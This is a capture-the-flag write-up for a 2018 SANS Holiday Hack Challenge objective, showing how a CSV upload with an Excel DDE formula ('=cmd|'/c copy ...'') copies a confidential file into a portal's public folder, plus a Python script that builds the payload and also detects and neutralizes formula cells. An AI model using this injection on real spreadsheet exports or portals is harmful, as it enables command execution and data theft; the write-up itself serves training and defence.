March 14, 2019

HR Incident Response

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup


1- Recommended: watch Brian Hostetler's talk about CSV injection:

2- Let's begin by creating our CSV injection file. First we need to find the publicly accessible folder we will copy "candidate_evaluation.docx" into, so try modifying the URL by appending the name of the file we are looking for:


You will get this error:

Publicly accessible file served from:

C:\careerportal\resources\public\ not found......

Try:’file name you are looking for’

This reveals the location of the publicly accessible folder on disk,


and the location the file will be served from once we have successfully copied it into the public folder.

3- Now let's shape the command we will inject. It is not PowerShell but a DDE formula (Excel treats a cell of the form =application|topic as a DDE link), which makes Excel launch cmd.exe with /c to copy the file into the public folder:

=cmd|'/c copy "C:\candidate_evaluation.docx" "C:\careerportal\resources\public\" '

You can use a Microsoft Excel sheet (or similar software) to create the file, or just use Notepad and add ";" to the end of the command, which gives a CSV file with one row and one column:

=cmd|'/c copy "C:\candidate_evaluation.docx" "C:\careerportal\resources\public\" ';

4- Upload the file to the Elf InfoSec Careers website.

5- Go to the URL for our file (you need to wait about a minute for the file to become accessible):
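As an added example (not code from the original write-up), the following Python script builds the same one-cell CSV payload the steps above describe, round-trips it through a CSV parser to show that the formula survives CSV quoting, and, on the defender's side, shows the check and neutralization a careers portal should apply to user-supplied fields before they reach an exported CSV. The file paths are the ones from the challenge; the function names and the sample applicant row are this example's own.

```python
import csv
import io

# Paths from the challenge, exactly as used in the write-up's payload.
SOURCE_FILE = "C:\\candidate_evaluation.docx"
PUBLIC_DIR = "C:\\careerportal\\resources\\public\\"

# Leading characters that make a spreadsheet treat a CSV cell as a formula
# (OWASP CSV injection guidance: =, +, -, @, tab, carriage return).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def build_dde_payload(src: str, dst: str) -> str:
    """Return the one-cell payload from the write-up: an Excel DDE link of the
    form =application|topic, here launching cmd.exe with /c to copy src to dst."""
    return f"=cmd|'/c copy \"{src}\" \"{dst}\"'"


def build_csv(cells):
    """Serialize one row. The csv module quotes a field that contains double
    quotes and doubles the quotes inside it, which is valid CSV; the
    spreadsheet un-escapes the field back to the original text and only then
    decides whether it is a formula, so the payload still fires."""
    buf = io.StringIO()
    csv.writer(buf, lineterminator="\n").writerow(cells)
    return buf.getvalue()


def parse_first_row(text: str):
    """Parse the CSV text back, as the spreadsheet would, and return row one."""
    return next(csv.reader(io.StringIO(text)))


def is_formula_cell(value: str) -> bool:
    """Detection check a portal should run on every user-supplied field
    before it is written into an exported CSV."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralize(value: str) -> str:
    """Defensive transform: a leading apostrophe makes Excel and LibreOffice
    treat the cell as literal text, so the DDE link is never evaluated."""
    return "'" + value if is_formula_cell(value) else value


def sanitize_row(cells):
    """Apply neutralize() to every cell of an export row (hypothetical helper)."""
    return [neutralize(c) for c in cells]


if __name__ == "__main__":
    payload = build_dde_payload(SOURCE_FILE, PUBLIC_DIR)
    csv_text = build_csv([payload])
    print(csv_text, end="")  # this is the file that gets uploaded to the portal
    assert parse_first_row(csv_text) == [payload]
    # Constructed applicant row as an HR export might contain it: the name
    # field is harmless, the second field carries the injected formula.
    row = ["Krampus", payload]
    print(build_csv(sanitize_row(row)), end="")
```

The trade-off of the neutralization is visible in the last line: any legitimate value that starts with a minus sign (a negative number, for instance) also gets the apostrophe, which is why the check belongs at export time on free-text fields rather than on numeric columns the application controls.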

6- Open the file and read the information; we are looking for the job applicant whose name begins with "K.":


The job applicant we are looking for is Krampus.

7- Let's find which terrorist organization is secretly supported by him:


The terrorist organization is Fancy Beaver.

📟 Go to your Badge > Objectives > Enter Fancy Beaver